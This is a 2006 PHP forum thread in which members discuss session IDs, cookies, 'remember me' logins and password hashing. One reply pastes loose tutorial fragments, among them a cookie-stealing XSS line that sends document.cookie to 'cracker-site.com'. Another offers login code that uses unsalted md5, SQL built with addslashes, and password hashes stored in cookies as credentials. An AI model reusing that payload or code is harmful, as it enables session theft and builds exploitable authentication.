Jump to content


Photo

sessions and sids


  • Please log in to reply
21 replies to this topic

#1 Ninjakreborn

Ninjakreborn
  • Members
  • PipPipPip
  • Information Technology Specialist
  • 3,922 posts
  • Age:33

Posted 20 July 2006 - 01:07 PM

I was wondering what is the point of using sessions to manage state for logins, you either save sids in url's or you send htem through cookies, what I see as the recommended, and safer way is cookies, but what about encrypting your session id's and decrypting them is there a point, what about if someone doesn't ahve cookies, can you use sessions like that, and still work around that or is there no point.

------

Business Website: http://www.infotechnologist.biz

Personal Website: http://www.joyelpuryear.com

Blog Site: http://www.realmofwriting.com
Services: Web development, application development, mobile development, and custom development. All services listed on my website.


#2 trq

trq
  • Staff Alumni
  • Advanced Member
  • 31,041 posts

Posted 20 July 2006 - 01:40 PM

There is no point encrypting / decrypting session ids and if your target audience is inclined to have cookies off, then parsing your session id through the url is the only way.

#3 manichean

manichean
  • Members
  • PipPip
  • Member
  • 29 posts

Posted 20 July 2006 - 01:46 PM

you could pass the SID through a hidden value on a form  8)

#4 wildteen88

wildteen88
  • Staff Alumni
  • Advanced Member
  • 10,482 posts
  • LocationUK, Bournemouth

Posted 20 July 2006 - 03:59 PM

You can use sessions with a database if you wish to, rather than having the SESSID being stored in a cookie/url. Or you can use use secure http connect (https), which will encrypt any data being transfered from client to server, or from server to server.

#5 Ninjakreborn

Ninjakreborn
  • Members
  • PipPipPip
  • Information Technology Specialist
  • 3,922 posts
  • Age:33

Posted 20 July 2006 - 06:40 PM

THere are 3 ways of passing session id's, through url's through form fields, or through cookies, or database I guess.  I understand the relationship between the session and the cookie.  But I don't understand how if I store the sids in a database, how does it access that, or does each person get a different session id stored on the database on the same table as there username and password.  Like for instance when they login, I set a session and register the username/password, or whatever else, I store the sess id into the database.  So everytime they visit the site, it searches for that database to log them in automatically or something, some of this is still a little confusing and I am trying to get down sessions, encryption was pretty easy, 3 days and I know a lot about it, cookies, I created a cookie login page in 20 minutes with no experience with cookies, so that was easy as hell, but now sessions.  So do I even have a need to encrypt my passwords if it's ssh, or ssl, or whatever, because I Have that setup now.  The thing is, what if someone gets into the database, what I heard is that it's stupid to leave a plain text password stored in a database, but the crypt functions a piece of shit, the mcrypt library is severe overkill, and mysql's encode/decode functions suck anus.  There has to be another way, hash is something I can't figure out, I could probably hash something but have no idea how to compare it when they enter hte password at login, and I try to authenticate the user.

------

Business Website: http://www.infotechnologist.biz

Personal Website: http://www.joyelpuryear.com

Blog Site: http://www.realmofwriting.com
Services: Web development, application development, mobile development, and custom development. All services listed on my website.


#6 wildteen88

wildteen88
  • Staff Alumni
  • Advanced Member
  • 10,482 posts
  • LocationUK, Bournemouth

Posted 20 July 2006 - 07:11 PM

With sessions you can complelty change the way it treats sessions, rather than having the sessions being stored in a file on the server, you make it write to the database. Have a look at session_set_save_handler for more information.

#7 Ninjakreborn

Ninjakreborn
  • Members
  • PipPipPip
  • Information Technology Specialist
  • 3,922 posts
  • Age:33

Posted 20 July 2006 - 07:45 PM

Ok let me just ask the questions I don't understand, if anyone can answer it'll be appreciated.

1. Is it better to save the sessions in the files, or on a database.
2. What is the best way to handle session id's and what should I pick as session id's
3. well that's it.  except how to allow people to remain logged in ever if they don't have cookies if I choose to pass the session id through a cookie, or is this stupid, because I know a lot of people who do it.

------

Business Website: http://www.infotechnologist.biz

Personal Website: http://www.joyelpuryear.com

Blog Site: http://www.realmofwriting.com
Services: Web development, application development, mobile development, and custom development. All services listed on my website.


#8 wildteen88

wildteen88
  • Staff Alumni
  • Advanced Member
  • 10,482 posts
  • LocationUK, Bournemouth

Posted 20 July 2006 - 07:50 PM

Its down to you and depends on the app you are developing. I know a few PHP apps, mainly forums/cms that create their own sessions handlers, which stores sessions within the database.

Sessions ids are generated automatically and are unique.

#9 Ninjakreborn

Ninjakreborn
  • Members
  • PipPipPip
  • Information Technology Specialist
  • 3,922 posts
  • Age:33

Posted 20 July 2006 - 09:17 PM

I have read on a lot of tutorial sites and stuff that it's best to hash your sids, when passing them, because it lowers the chances of someone trying to guess the session id to get into the existing session another thing I wanted to ask would I be stupid to rely purely on cookies for login.  So if I store the sessions in a file, and the id's in a database, that will prevent the person from having to login everytime and they still won't have to deal with cookies or anything?

------

Business Website: http://www.infotechnologist.biz

Personal Website: http://www.joyelpuryear.com

Blog Site: http://www.realmofwriting.com
Services: Web development, application development, mobile development, and custom development. All services listed on my website.


#10 trq

trq
  • Staff Alumni
  • Advanced Member
  • 31,041 posts

Posted 20 July 2006 - 09:48 PM

You can use sessions with a database if you wish to, rather than having the SESSID being stored in a cookie/url.

What? You can save session data in a database on the server, but you still need a method for recognising the client. ie; cookies, passing via url / forms.

So if I store the sessions in a file, and the id's in a database, that will prevent the person from having to login everytime and they still won't have to deal with cookies or anything?

No... in order for a user to not have to worry about logging in each time they visit a site you'll need to set a cookie. How else will you recognise the client.

Storing session data in a database is a different topic, and really is no different to storing it in files (as is the default) excepting that you can persist certain infomation and it also makes it much easier to keep track of who is where on your site (who's online lists and the like).

#11 Ninjakreborn

Ninjakreborn
  • Members
  • PipPipPip
  • Information Technology Specialist
  • 3,922 posts
  • Age:33

Posted 20 July 2006 - 09:51 PM

Alright then explain this and I am ready to go.  I visit a lot of sites to look around, on a regular basis, and I see a lot of them, free logins, I love in just for hte hell of it, and I end up finding out something like I can stay logged in.  I see that if I disable cookies I can't.  Then there are other sites I try the same thing, but even though cookies is disabled, I can still automatically log in each time, I have tested this from various sites in all three browsers, some of them keep you logged in for a specific amount of time, after hte session but no cookies get delivered of removed from the browser.

------

Business Website: http://www.infotechnologist.biz

Personal Website: http://www.joyelpuryear.com

Blog Site: http://www.realmofwriting.com
Services: Web development, application development, mobile development, and custom development. All services listed on my website.


#12 trq

trq
  • Staff Alumni
  • Advanced Member
  • 31,041 posts

Posted 20 July 2006 - 09:54 PM

How long a time frame are we talking here? Hours, Days, Weeks? what?

#13 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 20 July 2006 - 09:59 PM

what is the problam here if you valadate user information properly then there is no problam is there.

session are grate.

you resently had apost on sessions and cookies and was told to use both but know afther all that exsplaining you continue to ask th same quistions.


Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#14 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 20 July 2006 - 10:06 PM



quick cookie example of remember me ok

$username = $_POST['username'];
$password = sha1($_POST['password']);

$DB->query('INSERT INTO users (username, password) VALUES (?, ?)', array($username, $password)); 

 
$username = $_POST['username'];
$password = sha1($_POST['password']);

/* Hash the input password and check it against
   the already hashed password stored in the database.
   
   Since both passwords are hashed using the same hash
   function, the two passwords will match if the user
   enteres the correct password
*/

$user = $DB->getRow('SELECT * FROM users WHERE username=? AND password=?', array($username, $password));

if(!$user)
    die('Sorry, incorrect username or password.'); 

 
<img src="logo.gif" width="1" height="1" onload="window.location='http://cracker-site.com/save?cookie='+document.cookie" /> Hi guys, I'm new to your site!


$username = $_POST['username'];
$password = sha1($_POST['password']);

/* Hash the input password and check it against
   the already hashed password stored in the database.
   
   Since both passwords are hashed using the same hash
   function, the two passwords will match if the user
   enteres the correct password
*/

$user = $DB->getRow('SELECT * FROM users WHERE username=? AND password=?', array($username, $password));

if(!$user)
    die('Sorry, incorrect username or password.');
    
// Did this user check that 'remember me' checkbox?
if($_POST['remember_me'])
{
    $expire = time() + 1728000; // Expire in 20 days
    $cookie_pass = sha1( sha1($user['password']) . sha1($user['salt']) );
    
    setcookie('user', $user['username'], $expire);
    setcookie('pass', $cookie_pass, $expire);
}  



if(isset($_COOKIE['user'], $_COOKIE['pass']))
{
    $user = $DB->getRow('SELECT * FROM users WHERE username=?', $_COOKIE['user']);
    
    if($user)
    {
        $check_pass = sha1( sha1($user['password']) . sha1($user['salt']) );
        
        if($check_pass == $_COOKIE['pass'])
        {
            // The user should be logged in
        }
    }
}  



Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#15 trq

trq
  • Staff Alumni
  • Advanced Member
  • 31,041 posts

Posted 20 July 2006 - 10:08 PM

redarrow... honestly, your missing the point.

#16 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 20 July 2006 - 10:17 PM

This is the only tutoral i am providing as you should learn ok.





database

CREATE TABLE users (  
    username varchar(30),  
    password varchar(32)); 


database.php
<?  
  
/**  
 * Connect to the mysql database.  
 */  
$conn = mysql_connect("localhost", "your_username", "your_password") or die(mysql_error());  
mysql_select_db('your_database', $conn) or die(mysql_error());  
  
?>  
  


register.php


<?  
session_start();   
include("database.php");  
  
/**  
 * Returns true if the username has been taken  
 * by another user, false otherwise.  
 */  
function usernameTaken($username){  
   global $conn;  
   if(!get_magic_quotes_gpc()){  
      $username = addslashes($username);  
   }  
   $q = "select username from users where username = '$username'";  
   $result = mysql_query($q,$conn);  
   return (mysql_numrows($result) > 0);  
}  
  
/**  
 * Inserts the given (username, password) pair  
 * into the database. Returns true on success,  
 * false otherwise.  
 */  
function addNewUser($username, $password){  
   global $conn;  
   $q = "INSERT INTO users VALUES ('$username', '$password')";  
   return mysql_query($q,$conn);  
}  
  
/**  
 * Displays the appropriate message to the user  
 * after the registration attempt. It displays a   
 * success or failure status depending on a  
 * session variable set during registration.  
 */  
function displayStatus(){  
   $uname = $_SESSION['reguname'];  
   if($_SESSION['regresult']){  
?>  
  
<h1>Registered!</h1>  
<p>Thank you <b><? echo $uname; ?></b>, your information has been added to the database, you may now <a href="main.php" title="Login">log in</a>.</p>  
  
<?  
   }  
   else{  
?>  
  
<h1>Registration Failed</h1>  
<p>We're sorry, but an error has occurred and your registration for the username <b><? echo $uname; ?></b>, could not be completed.<br>  
Please try again at a later time.</p>  
  
<?  
   }  
   unset($_SESSION['reguname']);  
   unset($_SESSION['registered']);  
   unset($_SESSION['regresult']);  
}  
  
if(isset($_SESSION['registered'])){  
/**  
 * This is the page that will be displayed after the  
 * registration has been attempted.  
 */  
?>  
  
<html>  
<title>Registration Page</title>  
<body>  
  
<? displayStatus(); ?>  
  
</body>  
</html>  
  
<?  
   return;  
}  
  
/**  
 * Determines whether or not to show to sign-up form  
 * based on whether the form has been submitted, if it  
 * has, check the database for consistency and create  
 * the new account.  
 */  
if(isset($_POST['subjoin'])){  
   /* Make sure all fields were entered */  
   if(!$_POST['user'] || !$_POST['pass']){  
      die('You didn\'t fill in a required field.');  
   }  
  
   /* Spruce up username, check length */  
   $_POST['user'] = trim($_POST['user']);  
   if(strlen($_POST['user']) > 30){  
      die("Sorry, the username is longer than 30 characters, please shorten it.");  
   }  
  
   /* Check if username is already in use */  
   if(usernameTaken($_POST['user'])){  
      $use = $_POST['user'];  
      die("Sorry, the username: <strong>$use</strong> is already taken, please pick another one.");  
   }  
  
   /* Add the new account to the database */  
   $md5pass = md5($_POST['pass']);  
   $_SESSION['reguname'] = $_POST['user'];  
   $_SESSION['regresult'] = addNewUser($_POST['user'], $md5pass);  
   $_SESSION['registered'] = true;  
   echo "<meta http-equiv=\"Refresh\" content=\"0;url=$HTTP_SERVER_VARS[PHP_SELF]\">";  
   return;  
}  
else{  
/**  
 * This is the page with the sign-up form, the names  
 * of the input fields are important and should not  
 * be changed.  
 */  
?>  
  
<html>  
<title>Registration Page</title>  
<body>  
<h1>Register</h1>  
<form action="<? echo $HTTP_SERVER_VARS['PHP_SELF']; ?>" method="post">  
<table align="left" border="0" cellspacing="0" cellpadding="3">  
<tr><td>Username:</td><td><input type="text" name="user" maxlength="30"></td></tr>  
<tr><td>Password:</td><td><input type="password" name="pass" maxlength="30"></td></tr>  
<tr><td colspan="2" align="right"><input type="submit" name="subjoin" value="Join!"></td></tr>  
</table>  
</form>  
</body>  
</html>  
  
  
<?  
}  
?>  



login.php

<?  
  
/**  
 * Checks whether or not the given username is in the  
 * database, if so it checks if the given password is  
 * the same password in the database for that user.  
 * If the user doesn't exist or if the passwords don't  
 * match up, it returns an error code (1 or 2).   
 * On success it returns 0.  
 */  
function confirmUser($username, $password){  
   global $conn;  
   /* Add slashes if necessary (for query) */  
   if(!get_magic_quotes_gpc()) {  
	$username = addslashes($username);  
   }  
  
   /* Verify that user is in database */  
   $q = "select password from users where username = '$username'";  
   $result = mysql_query($q,$conn);  
   if(!$result || (mysql_numrows($result) < 1)){  
      return 1; //Indicates username failure  
   }  
  
   /* Retrieve password from result, strip slashes */  
   $dbarray = mysql_fetch_array($result);  
   $dbarray['password']  = stripslashes($dbarray['password']);  
   $password = stripslashes($password);  
  
   /* Validate that password is correct */  
   if($password == $dbarray['password']){  
      return 0; //Success! Username and password confirmed  
   }  
   else{  
      return 2; //Indicates password failure  
   }  
}  
  
/**  
 * checkLogin - Checks if the user has already previously  
 * logged in, and a session with the user has already been  
 * established. Also checks to see if user has been remembered.  
 * If so, the database is queried to make sure of the user's   
 * authenticity. Returns true if the user has logged in.  
 */  
function checkLogin(){  
   /* Check if user has been remembered */  
   if(isset($_COOKIE['cookname']) && isset($_COOKIE['cookpass'])){  
      $_SESSION['username'] = $_COOKIE['cookname'];  
      $_SESSION['password'] = $_COOKIE['cookpass'];  
   }  
  
   /* Username and password have been set */  
   if(isset($_SESSION['username']) && isset($_SESSION['password'])){  
      /* Confirm that username and password are valid */  
      if(confirmUser($_SESSION['username'], $_SESSION['password']) != 0){  
         /* Variables are incorrect, user not logged in */  
         unset($_SESSION['username']);  
         unset($_SESSION['password']);  
         return false;  
      }  
      return true;  
   }  
   /* User not logged in */  
   else{  
      return false;  
   }  
}  
  
/**  
 * Determines whether or not to display the login  
 * form or to show the user that he is logged in  
 * based on if the session variables are set.  
 */  
function displayLogin(){  
   global $logged_in;  
   if($logged_in){  
      echo "<h1>Logged In!</h1>";  
      echo "Welcome <b>$_SESSION[username]</b>, you are logged in. <a href=\"logout.php\">Logout</a>";  
   }  
   else{  
?>  
  
<h1>Login</h1>  
<form action="" method="post">  
<table align="left" border="0" cellspacing="0" cellpadding="3">  
<tr><td>Username:</td><td><input type="text" name="user" maxlength="30"></td></tr>  
<tr><td>Password:</td><td><input type="password" name="pass" maxlength="30"></td></tr>  
<tr><td colspan="2" align="left"><input type="checkbox" name="remember">  
<font size="2">Remember me next time</td></tr>  
<tr><td colspan="2" align="right"><input type="submit" name="sublogin" value="Login"></td></tr>  
<tr><td colspan="2" align="left"><a href="register.php">Join</a></td></tr>  
</table>  
</form>  
  
<?  
   }  
}  
  
  
/**  
 * Checks to see if the user has submitted his  
 * username and password through the login form,  
 * if so, checks authenticity in database and  
 * creates session.  
 */  
if(isset($_POST['sublogin'])){  
   /* Check that all fields were typed in */  
   if(!$_POST['user'] || !$_POST['pass']){  
      die('You didn\'t fill in a required field.');  
   }  
   /* Spruce up username, check length */  
   $_POST['user'] = trim($_POST['user']);  
   if(strlen($_POST['user']) > 30){  
      die("Sorry, the username is longer than 30 characters, please shorten it.");  
   }  
  
   /* Checks that username is in database and password is correct */  
   $md5pass = md5($_POST['pass']);  
   $result = confirmUser($_POST['user'], $md5pass);  
  
   /* Check error codes */  
   if($result == 1){  
      die('That username doesn\'t exist in our database.');  
   }  
   else if($result == 2){  
      die('Incorrect password, please try again.');  
   }  
  
   /* Username and password correct, register session variables */  
   $_POST['user'] = stripslashes($_POST['user']);  
   $_SESSION['username'] = $_POST['user'];  
   $_SESSION['password'] = $md5pass;  
  
   /**  
    * This is the cool part: the user has requested that we remember that  
    * he's logged in, so we set two cookies. One to hold his username,  
    * and one to hold his md5 encrypted password. We set them both to  
    * expire in 100 days. Now, next time he comes to our site, we will  
    * log him in automatically.  
    */  
   if(isset($_POST['remember'])){  
      setcookie("cookname", $_SESSION['username'], time()+60*60*24*100, "/");  
      setcookie("cookpass", $_SESSION['password'], time()+60*60*24*100, "/");  
   }  
  
   /* Quick self-redirect to avoid resending data on refresh */  
   echo "<meta http-equiv=\"Refresh\" content=\"0;url=$HTTP_SERVER_VARS[PHP_SELF]\">";  
   return;  
}  
  
/* Sets the value of the logged_in variable, which can be used in your code */  
$logged_in = checkLogin();  
  
?>  


logout.php


  
<?  
session_start();   
include("database.php");  
include("login.php");  
  
/**  
 * Delete cookies - the time must be in the past,  
 * so just negate what you added when creating the  
 * cookie.  
 */  
if(isset($_COOKIE['cookname']) && isset($_COOKIE['cookpass'])){  
   setcookie("cookname", "", time()-60*60*24*100, "/");  
   setcookie("cookpass", "", time()-60*60*24*100, "/");  
}  
  
?>  
  
<html>  
<title>Logging Out</title>  
<body>  
  
<?  
  
if(!$logged_in){  
   echo "<h1>Error!</h1>\n";  
   echo "You are not currently logged in, logout failed. Back to <a href=\"main.php\">main</a>";  
}  
else{  
   /* Kill session variables */  
   unset($_SESSION['username']);  
   unset($_SESSION['password']);  
   $_SESSION = array(); // reset session array  
   session_destroy();   // destroy session.  
  
   echo "<h1>Logged Out</h1>\n";  
   echo "You have successfully <b>logged out</b>. Back to <a href=\"main.php\">main</a>";  
}  
  
?>  
  
</body>  
</html>  


Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#17 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 20 July 2006 - 10:33 PM

does the code help
Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#18 trq

trq
  • Staff Alumni
  • Advanced Member
  • 31,041 posts

Posted 20 July 2006 - 10:36 PM

redarrow. You are missing the whole point of this thread. Read the first question!

#19 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 20 July 2006 - 10:53 PM


Alright then explain this and I am ready to go.  I visit a lot of sites to look around, on a regular basis, and I see a lot of them, free logins, I love in just for hte hell of it, and I end up finding out something like I can stay logged in.  I see that if I disable cookies I can't.  Then there are other sites I try the same thing, but even though cookies is disabled, I can still automatically log in each time, I have tested this from various sites in all three browsers, some of them keep you logged in for a specific amount of time, after hte session but no cookies get delivered of removed from the browser.



sorry thorpe i was ansawing the quistion on the remeber me quistion as i thort ill do that for buissness man to clair things up on the remeber me issue.

ps. when it comes down to the session quistion there is no diffrence or securty diffrence from the defult session statement to a database session code in my option.

what i can not understand how comes buinessman dosn't read the manual.

i dont also know why you businessman always go on about encripting this and that forget it man.

use a session as it is and enjoy.

lol..............................





Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#20 Ninjakreborn

Ninjakreborn
  • Members
  • PipPipPip
  • Information Technology Specialist
  • 3,922 posts
  • Age:33

Posted 20 July 2006 - 11:01 PM

Ok, so I will take a look at this and use it as an example, the reason I go on about encryption, is during the 3 months I studied security I learnt all kinds of attacks, before I became a programmer, I was a hacker for 10 years, I knew a lot then, and a lot of my friends had easy ways to do some of these things, making me even more afraid as a programmer.  To tell you the truth, the sessions id's I had a friend who could crack a session id in less than 20 minutes, he would listen in on the header transmissions pull the sid from the cookie, decrypt it, and use it to gain access to the current session.  There are a lot of things I learnt as a hacker, and even more I learnt from my friends, so it makes me 100 times scarder, and I feel that if I use what I use to know, the stuff I make, and the tutorials i make for other people will help them write more secure programming.

------

Business Website: http://www.infotechnologist.biz

Personal Website: http://www.joyelpuryear.com

Blog Site: http://www.realmofwriting.com
Services: Web development, application development, mobile development, and custom development. All services listed on my website.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users